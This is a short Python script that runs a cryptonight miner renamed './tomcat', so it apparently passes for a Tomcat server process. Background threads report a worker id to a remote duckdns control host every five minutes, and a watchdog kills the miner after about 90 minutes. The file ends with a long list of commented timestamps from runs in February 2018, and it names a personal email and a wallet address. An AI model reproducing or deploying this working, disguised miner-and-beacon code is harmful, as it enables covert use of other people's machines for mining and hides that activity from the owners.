import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:05.943197
#2018-02-17 16:06:02.067471
#2018-02-17 17:53:03.996246
#2018-02-17 19:39:02.159624
#2018-02-17 21:27:07.393258
#2018-02-17 23:12:03.484028
#2018-02-18 00:59:05.513337
#2018-02-18 02:47:04.870440
#2018-02-18 04:33:05.657823
#2018-02-18 06:24:06.372431
#2018-02-18 08:13:05.498214
#2018-02-18 10:01:07.336191
#2018-02-18 11:48:03.552393
#2018-02-18 13:33:05.890132
#2018-02-18 15:22:04.573512
#2018-02-18 17:11:06.787879
#2018-02-18 18:59:05.400535
#2018-02-18 20:45:09.631853
#2018-02-18 22:31:04.617170
#2018-02-19 00:19:01.547217
#2018-02-19 02:05:06.312125
#2018-02-19 03:52:06.211914
#2018-02-19 05:37:06.401518
#2018-02-19 07:24:04.282141
#2018-02-19 09:14:01.674295
#2018-02-19 11:03:08.709610
#2018-02-19 12:50:01.314587
#2018-02-19 14:37:06.895649
#2018-02-19 16:27:04.500911
#2018-02-19 18:14:06.234907
#2018-02-19 20:01:05.811956
#2018-02-19 21:51:05.832124
#2018-02-19 23:37:01.880886
#2018-02-20 01:22:07.759675
#2018-02-20 03:12:04.191890
#2018-02-20 04:58:07.674231
#2018-02-20 06:42:07.142225
#2018-02-20 08:28:05.629108
#2018-02-20 10:13:06.424077
#2018-02-20 11:57:08.344658
#2018-02-20 13:44:08.308066
#2018-02-20 15:28:04.520393
#2018-02-20 17:14:09.185180
#2018-02-20 19:03:08.622513
#2018-02-20 20:51:08.450658
#2018-02-20 22:35:01.563909
#2018-02-21 00:16:05.431561
#2018-02-21 02:01:05.355105
#2018-02-21 03:49:04.427112
#2018-02-21 05:37:02.082734
#2018-02-21 07:25:06.677663
#2018-02-21 09:09:07.681652
#2018-02-21 10:58:06.143329
#2018-02-21 12:46:03.596800
#2018-02-21 14:36:04.210091
#2018-02-21 16:23:05.009603
#2018-02-21 18:15:10.906548
#2018-02-21 20:02:06.884648
#2018-02-21 21:51:04.528588
#2018-02-21 23:38:06.214137
#2018-02-22 01:26:07.025952
#2018-02-22 03:14:08.583882
#2018-02-22 05:01:06.774123
#2018-02-22 06:45:06.903354
#2018-02-22 08:34:07.206175
#2018-02-22 10:21:05.633955
#2018-02-22 12:06:09.633924
#2018-02-22 13:51:01.355438
#2018-02-22 15:39:01.972575
#2018-02-22 17:25:10.984184
#2018-02-22 19:13:05.693839
#2018-02-22 21:05:07.682857
#2018-02-22 22:52:06.487219
#2018-02-23 00:40:09.676157
#2018-02-23 02:29:05.208028
#2018-02-23 04:18:07.305598
#2018-02-23 06:05:09.009000
#2018-02-23 07:50:06.701513
#2018-02-23 09:52:06.036681
#2018-02-23 11:56:12.579578
#2018-02-23 13:45:08.402328
#2018-02-23 15:35:09.159070
#2018-02-23 17:25:05.872907
#2018-02-23 19:12:01.272854
#2018-02-23 20:56:04.114879
#2018-02-23 23:04:01.358717
#2018-02-24 00:50:04.650388
#2018-02-24 02:40:07.203040
#2018-02-24 05:29:03.603867
#2018-02-24 07:16:01.546692
#2018-02-24 09:05:07.256997
#2018-02-24 11:04:05.583382
#2018-02-24 12:52:06.966906
#2018-02-24 14:40:05.807159
#2018-02-24 16:31:06.583080
#2018-02-24 18:21:04.414975
#2018-02-24 20:07:02.040358
#2018-02-24 21:50:07.827856
#2018-02-25 02:02:03.873936
#2018-02-25 05:57:03.798315
#2018-02-25 11:38:07.143506